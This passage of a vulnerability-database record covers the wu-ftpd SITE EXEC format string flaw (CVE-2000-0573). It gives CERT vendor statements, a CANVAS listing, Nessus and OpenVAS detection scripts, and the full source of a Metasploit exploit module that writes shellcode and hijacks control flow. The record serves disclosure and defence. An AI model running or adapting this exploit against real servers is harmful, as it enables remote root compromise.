FreeBSD makes no guarantee about the security of third-party software in the ports collection and users are advised that there may be security vulnerabilities in other FTP servers available there.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nAn _update_ to proftpd is now available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Fujitsu __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFujitsu's UXP/V operating system is not vulnerable to any of the vulnerabilities discussed in [this] advisory. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Microsoft __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe IIS FTP service is not affected by these issues.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Porcupine.org __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n[...] None of my software [ftpd from my [_logdaemon_](<ftp://ftp.porcupine.org/pub/security/index.html#software>) utilities] has either the \"site exec\" or \"setproctitle\" features enabled. 
\n\nWietse Venema_ \n_[_mailto:wietse@porcupine.org_](<mailto:wietse@porcupine.org>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### SGI __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nIRIX ftpd is not vulnerable to the issues mentioned in this advisory. See [_ftp://sgigate.sgi.com/security/20000701-01-I_](<ftp://sgigate.sgi.com/security/20000701-01-I>) for more information. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Sun __ Not Affected\n\nUpdated: October 11, 2000 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nSISP FTPD is similar to wu-ftpd. SISP FTPD does not allow site exec nor does it use setproctitle(). 
Therefore, SISP FTPD does not appear to be vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Caldera __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nPlease see CSSA-2000-020.0 regarding the wu-ftpd issue and OpenLinux: \n\n \n[_ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-020.0.txt_](<ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-020.0.txt>) Copyright \u00a9 2000 Caldera Systems, Inc. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Compaq Computer Corporation __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nAt the time of writing this document, this reported problem is currently still under evaluation by engineering to determine the requirement of a solution if necessary. COMPAQ will provide an update to this advisory accordingly. 
\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### MIT Kerberos Development Team __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nIt seems that the MIT Kerberos ftpd is based on BSD ftpd revision 5.40, and has never contained any serious format string related bugs for some reason. It is possible that by defining an undocumented CPP macro SETPROCTITLE, calls to setproctitle() can be made, however, there is an internally declared setproctitle() function that does not take a format string as its argument, and is hence not vulnerable.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### MandrakeSoft __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nPlease see the MANDRAKE 7.1 update section for wu-ftpd information at: \n\n \n[_http://www.linux-mandrake.com/en/fupdates.php3_](<http://www.linux-mandrake.com/en/fupdates.php3>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### ProFTPD __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor 
Statement\n\nUpgrade to ProFTPD 1.2.0: \n\n \n[_http://www.proftpd.net/download.html_](<http://www.proftpd.net/download.html>) Please see the discussion concerning setproctitle() at [_http://www.proftpd.org/proftpd-l-archive/00-07/msg00059.html_](<http://www.proftpd.org/proftpd-l-archive/00-07/msg00059.html>) _ \n_[_http://www.proftpd.org/proftpd-l-archive/00-07/msg00060.html_](<http://www.proftpd.org/proftpd-l-archive/00-07/msg00060.html>) _ \n_[_http://bugs.proftpd.net/show_bug.cgi?id=121_](<http://bugs.proftpd.net/show_bug.cgi?id=121>) _ \n_[_http://www.proftpd.net/security.html_](<http://www.proftpd.net/security.html>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### RedHat __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nPlease see RHSA-2000-039-02 regarding the wu-ftpd issue: \n\n \n[_http://www.redhat.com/support/errata/RHSA-2000-039-02.html_](<http://www.redhat.com/support/errata/RHSA-2000-039-02.html>) Copyright \u00a9 2000 Red Hat, Inc. All rights reserved. 
\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### Slackware __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nPlease see the patches made available regarding the wu-ftpd issue, at: \n\n \n[_ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/wu-ftpd-patch.README_](<ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/wu-ftpd-patch.README>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n### SuSE __ Unknown\n\nUpdated: October 11, 2000 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nPlease see SuSE Security Announcement #53 regarding the wu-ftpd issue, at: \n\n \n[_http://www.suse.de/de/support/security/suse_security_announce_53.txt_](<http://www.suse.de/de/support/security/suse_security_announce_53.txt>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%2329823 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * 
<ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-2000.02>\n * <http://www.securityfocus.com/bid/1387>\n * <ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_2.6.0/lreply-buffer-overflow.patch>\n * <ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz>\n * <ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz.asc>\n * <ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z>\n * <ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z.asc>\n * <http://ciac.llnl.gov/ciac/bulletins/k-054.shtml>\n * <http://www.linuxsecurity.com/advisories/advisory_documents/other_advisory-499.html> (Conectiva)\n * <ftp://ftp.conectiva.com.br/pub/conectiva/>\n * <http://www.debian.org/security/2000/20000623>\n * <ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-020.0.txt>\n * <http://www.redhat.com/support/errata/RHSA-2000-039-02.html>\n * <http://www.linux-mandrake.com/en/fupdates.php3>\n * <ftp://ftp.slackware.com/pub/slackware/slackware-7.1/patches/wu-ftpd-patch.README>\n * <http://www.suse.de/de/support/security/suse_security_announce_53.txt>\n * <ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00%3A29.wu-ftpd.asc.v1.1>\n * <ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-009.txt.asc>\n * <ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-010.txt.asc>\n * <ftp://sgigate.sgi.com/security/20000701-01-I>\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0573>\n * [http://www.securityfocus.com/templates/forum_message.html?forum=2&head=3342&id=3342](<http://www.securityfocus.com/templates/forum_message.html?forum=2&head=3342&id=3342>)\n * [http://www.securityfocus.com/templates/archive.pike?list=1&mid=66842](<http://www.securityfocus.com/templates/archive.pike?list=1&mid=66842>)\n * <http://www.proftpd.net/download.html>\n * <http://www.proftpd.org/proftpd-l-archive/00-07/msg00059.html>\n * <http://www.proftpd.org/proftpd-l-archive/00-07/msg00060.html>\n * <http://bugs.proftpd.net/show_bug.cgi?id=121>\n * 
<http://www.proftpd.net/security.html>\n * <http://www.openbsd.org/errata.html#ftpd>\n * <http://www.redhat.com/support/errata/RHSA-2000-039-02.html>\n\n### Acknowledgements\n\nThe CERT Coordination Center thanks Gregory Lundberg and Theo de Raadt for their help in developing this document.\n\nThis document was written by Jeff S Havrilla.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2000-0573](<http://web.nvd.nist.gov/vuln/detail/CVE-2000-0573>) \n---|--- \n**CERT Advisory:** | [CA-2000-13 ](<http://www.cert.org/advisories/CA-2000-13.html>) \n**Severity Metric:** | 87.72 \n**Date Public:** | 2000-06-23 \n**Date First Published:** | 2000-10-02 \n**Date Last Updated: ** | 2001-02-19 22:04 UTC \n**Document Revision: ** | 7 \n", "modified": "2001-02-19T22:04:00", "published": "2000-10-02T00:00:00", "id": "VU:29823", "href": "https://www.kb.cert.org/vuls/id/29823", "type": "cert", "title": "Format string input validation error in wu-ftpd site_exec() function", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-13T00:43:30", "description": "This module exploits a format string vulnerability in versions of the Washington University FTP server older than 2.6.1. 
By executing specially crafted SITE EXEC or SITE INDEX commands containing format specifiers, an attacker can corrupt memory and execute arbitrary code.\n", "published": "2009-12-06T02:30:42", "type": "metasploit", "title": "WU-FTPD SITE EXEC/INDEX Format String Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/MULTI/FTP/WUFTPD_SITE_EXEC_FORMAT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Ftp\n include Msf::Exploit::FormatString\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WU-FTPD SITE EXEC/INDEX Format String Vulnerability',\n 'Description' => %q{\n This module exploits a format string vulnerability in versions of the\n Washington University FTP server older than 2.6.1. 
By executing\n specially crafted SITE EXEC or SITE INDEX commands containing format\n specifiers, an attacker can corrupt memory and execute arbitrary code.\n },\n 'Author' => [ 'jduck' ],\n 'References' =>\n [\n ['CVE', '2000-0573'],\n ['OSVDB', '11805'],\n ['BID', '1387']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'PrependChrootBreak' => true\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n # format string max length\n 'Space' => 256,\n # NOTE: \\xff's need to be doubled (per ftp/telnet stuff)\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x25\\x2f\",\n 'DisableNops'\t=> 'True',\n 'StackAdjustment' \t=> -1500\n },\n 'Platform' => [ 'linux' ],\n 'Targets' =>\n [\n #\n # Automatic targeting via fingerprinting\n #\n [ 'Automatic Targeting', { 'auto' => true } ],\n\n #\n # specific targets\n #\n [\t'Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)',\n {\n 'UseDPA' \t=> false,\n 'PadBytes'\t=> 3,\n 'NumPops' \t=> 8,\n 'AddrPops' => 100,\n 'Offset' => -2088, \t\t\t# offset to stack return\n 'Writable' \t=> 0xbfffde26, \t# stack, avoid badchars\n 'FlowHook'\t=> -1, # auto now... 0xbffff1e4\t\t# stack return addr\n }\n ],\n # these aren't exploitable (using built-in, stripped down vsprintf, no %n)\n #[\t'RedHat 5.2 (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998)',\n #[\t'RedHat 6.0 (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999)',\n #[\t'RedHat 6.1 (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999)',\n [\t'RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)',\n {\n 'UseDPA' \t=> true,\n 'PadBytes'\t=> 2,\n 'NumPops' \t=> 276,\n 'AddrPops' => 2,\n 'Offset' => -17664, \t\t\t# offset to stack return\n 'Writable' \t=> 0x806e726,\t\t# bss\n #'Writable' \t=> 0xbfff0126,\t\t# stack, avoid badchars\n 'FlowHook'\t=> -1, # auto now... 
0xbfffb028\t\t# stack return addr\n #'FlowHook' => 0x806e1e0\t\t# GOT of sprintf\n }\n ],\n\n #\n # this one will detect the parameters automagicly\n #\n [\t'Debug',\n {\n 'UseDPA' \t=> false,\n 'PadBytes'\t=> 0,\n 'NumPops' \t=> 0,\n 'AddrPops' => -1,\n 'Offset' => -1,\n 'Writable' \t=> 0x41414242, \t#\n 'FlowHook'\t=> 0x43434545\t\t#\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jun 22 2000'))\n register_options(\n [\n Opt::RPORT(21),\n ])\n end\n\n\n def check\n # NOTE: We don't care if the login failed here...\n ret = connect_login\n\n # We just want the banner to check against our targets..\n vprint_status(\"FTP Banner: #{banner.strip}\")\n status = Exploit::CheckCode::Safe\n if banner =~ /Version wu-2\\.(4|5)/\n status = Exploit::CheckCode::Appears\n elsif banner =~ /Version wu-2\\.6\\.0/\n status = Exploit::CheckCode::Appears\n end\n\n # If we've made it this far, we care if login succeeded.\n if (ret)\n # NOTE: vulnerable and exploitable might not mean the same thing here :)\n if not fmtstr_detect_vulnerable\n status = Exploit::CheckCode::Safe\n end\n if not fmtstr_detect_exploitable\n status = Exploit::CheckCode::Safe\n end\n end\n\n disconnect\n return status\n end\n\n\n def exploit\n\n if (not connect_login)\n fail_with(Failure::Unknown, 'Unable to authenticate')\n end\n\n # Use a copy of the target\n mytarget = target\n\n if (target['auto'])\n mytarget = nil\n\n print_status(\"Automatically detecting the target...\")\n if (banner and (m = banner.match(/\\(Version wu-(.*)\\) ready/))) then\n print_status(\"FTP Banner: #{banner.strip}\")\n version = m[1]\n else\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n\n regexp = Regexp.escape(version)\n self.targets.each do |t|\n if (t.name =~ /#{regexp}/) then\n mytarget = t\n break\n end\n end\n\n if (not mytarget)\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n\n print_status(\"Selected Target: #{mytarget.name}\")\n else\n print_status(\"Trying target 
#{mytarget.name}...\")\n if banner\n print_status(\"FTP Banner: #{banner.strip}\")\n end\n end\n\n # proceed with chosen target...\n\n # detect stuff!\n if mytarget.name == \"Debug\"\n #fmtstr_set_caps(true, true)\n # dump the stack, so we can detect stuff magically\n print_status(\"Dumping the stack...\")\n stack = Array.new\n extra = \"aaaabbbb\"\n 1000.times do |x|\n dw = fmtstr_stack_read(x+1, extra)\n break if not dw\n stack << dw\n end\n\n stack_data = stack.pack('V*')\n print_status(\"Obtained #{stack.length*4} bytes of stack data:\\n\" + Rex::Text.to_hex_dump(stack_data))\n\n # detect the number of pad bytes\n idx = stack_data.index(\"aaaabbbb\")\n if not idx\n fail_with(Failure::Unknown, \"Whoa, didn't find the static bytes on the stack!\")\n end\n num_pad = 0\n num_pad = 4 - (idx % 4) if (idx % 4) > 0\n mytarget.opts['PadBytes'] = num_pad\n\n # calculate the number of pops needed to hit our addr\n num_pops = (idx + num_pad) / 4\n mytarget.opts['NumPops'] = num_pops\n else\n num_pad = mytarget['PadBytes']\n num_pops = mytarget['NumPops']\n sc_loc = mytarget['Writable']\n ret = mytarget['FlowHook']\n end\n\n print_status(\"Number of pad bytes: #{num_pad}\")\n print_status(\"Number of pops: #{num_pops}\")\n\n # debugging -> don't try it!\n return if mytarget.name == \"Debug\"\n\n #print_status(\"ATTACH!\")\n #select(nil,nil,nil,5)\n\n fmtstr_detect_caps\n\n # compute the stack return address using the fmt to leak memory\n addr_pops = mytarget['AddrPops']\n offset = mytarget['Offset']\n if addr_pops > 0\n stackaddr = fmtstr_stack_read(addr_pops)\n print_status(\"Read %#x from offset %d\" % [stackaddr, addr_pops])\n ret = stackaddr + offset\n end\n\n print_status(\"Writing shellcode to: %#x\" % sc_loc)\n print_status(\"Hijacking control via %#x\" % ret)\n\n\n # no extra bytes before the padding..\n num_start = 0\n\n # write shellcode to 'writable'\n arr = fmtstr_gen_array_from_buf(sc_loc, payload.encoded, mytarget)\n\n # process it in groups of 24 (max ~400 
bytes per command)\n sc_num = 1\n while arr.length > 0\n print_status(\"Sending part #{sc_num} of the payload...\")\n sc_num += 1\n\n narr = arr.slice!(0..24)\n\n fmtbuf = fmtstr_gen_from_array(num_start, narr, mytarget)\n # a space allows the next part to start with a '/'\n fmtbuf[num_pad-1,1] = \" \"\n fmtbuf.gsub!(/\\xff/, \"\\xff\\xff\")\n if ((res = send_cmd(['SITE', 'EXEC', fmtbuf], true)))\n if res[0,4] == \"500 \"\n fail_with(Failure::Unknown, \"Something went wrong when uploading the payload...\")\n end\n end\n end\n\n\n # write 'writable' addr to flowhook (execute shellcode)\n # NOTE: the resulting two writes must be done at the same time\n print_status(\"Attempting to write %#x to %#x..\" % [sc_loc, ret])\n\n fmtbuf = generate_fmt_two_shorts(num_start, ret, sc_loc, mytarget)\n # a space allows the next part to start with a '/'\n fmtbuf[num_pad-1,1] = \" \"\n fmtbuf.gsub!(/\\xff/, \"\\xff\\xff\")\n # don't wait for the response here :)\n res = send_cmd(['SITE', 'EXEC', fmtbuf], false)\n\n print_status(\"Your payload should have executed now...\")\n handler\n end\n\n\n #\n # these two functions are used to read stack memory\n # (used by fmtstr_stack_read()\n #\n def trigger_fmt(fmtstr)\n return nil if fmtstr.length >= (512 - (4+1 + 4+1 + 2 + 2))\n send_cmd(['SITE', 'EXEC', 'x', fmtstr], true)\n end\n\n def extract_fmt_output(res)\n if (res =~ /^5.. /)\n #throw \"Crap! 
Something went wrong while dumping the stack...\"\n return nil\n end\n ret = res.strip.split(/\\r?\\n/)[0]\n ret = ret[6,ret.length]\n return ret\n end\n\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/ftp/wuftpd_site_exec_format.rb"}], "canvas": [{"lastseen": "2019-05-29T17:19:20", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "description": "**Name**| wuftpd_sexec \n---|--- \n**CVE**| CVE-2000-0573 \n**Exploit Pack**| [CANVAS](<http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| WuFTPD SITE EXEC Formatstring Bug \n**Notes**| References: http://www.securityfocus.com/bid/1387 \nCVE Name: CVE-2000-0573 \nVENDOR: wuftpd.org \nRepeatability: Multiple tries \nDate public: 22-06-2000 \nCERT Advisory: http://www.cert.org/advisories/CA-2000-13.html \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0573 \nCVSS: 10.0 \n\n", "edition": 2, "modified": "2000-07-07T04:00:00", "published": "2000-07-07T04:00:00", "id": "WUFTPD_SEXEC", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/wuftpd_sexec", "type": "canvas", "title": "Immunity Canvas: WUFTPD_SEXEC", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T07:01:06", "description": "The version of WU-FTPD hosted on the remote server does not properly\nsanitize the argument of the SITE EXEC command. 
It may be possible for\na remote attacker to gain root access.", "edition": 25, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2000-06-27T00:00:00", "title": "WU-FTPD site_exec() Function Remote Format String", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2000-0573"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "WU_FTPD_SITE_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/10452", "sourceData": "#\n# This script was written by Alexis de Bernis <alexisb@nessus.org>\n#\n\n# Changes by Tenable:\n# - rely on the banner if we could not log in\n# - changed the description to include a Solution:\n# - revised plugin title, removed unrelated CVE ref (2/04/2009)\n#\n# See the Nessus Scripts License for details\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10452);\n script_version(\"1.49\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2000-0573\");\n script_bugtraq_id(726, 1387, 2240);\n\n script_name(english:\"WU-FTPD site_exec() Function Remote Format String\");\n script_summary(english:\"Checks if the remote FTP server sanitizes the SITE EXEC command\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is running an FTP server with a remote root\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of WU-FTPD hosted on the remote server does not properly\nsanitize the argument of the SITE EXEC command. 
It may be possible for\na remote attacker to gain root access.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=bugtraq&m=96171893218000&w=2\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to WU-FTPD version 2.6.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2000-0573\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WU-FTPD SITE EXEC/INDEX Format String Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2000/06/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"FTP\");\n\n script_copyright(english:\"This script is Copyright (C) 2000-2018 A. 
de Bernis\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"ftp_anonymous.nasl\");\n script_require_keys(\"ftp/wuftpd\");\n script_require_ports(\"Services/ftp\", 21);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"ftp_func.inc\");\n\nlogin = get_kb_item(\"ftp/login\");\npass = get_kb_item(\"ftp/password\");\n\n# Connect to the FTP server\nport = get_ftp_port(default: 21);\n\nftpport = port;\n\nif(login)\n{\n soc = ftp_open_and_authenticate( user:login, pass:pass, port:port );\n if(soc)\n {\n # We are in\n c = 'SITE EXEC %p \\r\\n';\n send(socket:soc, data:c);\n b = recv(socket:soc, length:6);\n if(b == \"200-0x\") security_hole(ftpport);\n ftp_close(socket: soc);\n exit(0);\n }\n else\n {\n soc = open_sock_tcp(ftpport);\n if (! soc ) audit(AUDIT_SOCK_FAIL,ftpport);\n r = ftp_recv_line(socket:soc);\n close(soc);\n }\n}\n if (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n if(egrep(pattern:\"220.*FTP server.*[vV]ersion (wu|wuftpd)-((1\\..*)|(2\\.[0-5]\\..*)|(2\\.6\\.0)).*\",\n \t string:r)){\n\t report = \"\nNessus is solely basing this finding on the version reported\nin the banner, so this may be a false positive.\n\";\n\t security_hole(port:ftpport, extra:report);\n\t }\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:32:01", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0997", "CVE-2000-0573"], "description": "The remote FTP server does not properly sanitize the argument of\n the SITE EXEC command.", "modified": "2019-02-12T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010452", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010452", "type": "openvas", "title": "wu-ftpd SITE EXEC vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: wu_ftpd_site_exec.nasl 13602 2019-02-12 12:47:59Z cfischer 
$\n#\n# wu-ftpd SITE EXEC vulnerability\n#\n# Authors:\n# Alexis de Bernis <alexisb@nessus.org>\n# changes by rd :\n# - rely on the banner if we could not log in\n# - changed the description to include a Solution:\n#\n# Copyright:\n# Copyright (C) 2000 A. de Bernis\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:washington_university:wu-ftpd\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10452\");\n script_version(\"$Revision: 13602 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-12 13:47:59 +0100 (Tue, 12 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(1387, 2240, 726);\n script_xref(name:\"IAVA\", value:\"2000-a-0004\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2000-0573\", \"CVE-1999-0997\");\n script_name(\"wu-ftpd SITE EXEC vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_family(\"FTP\");\n script_copyright(\"This script is Copyright (C) 2000 A. 
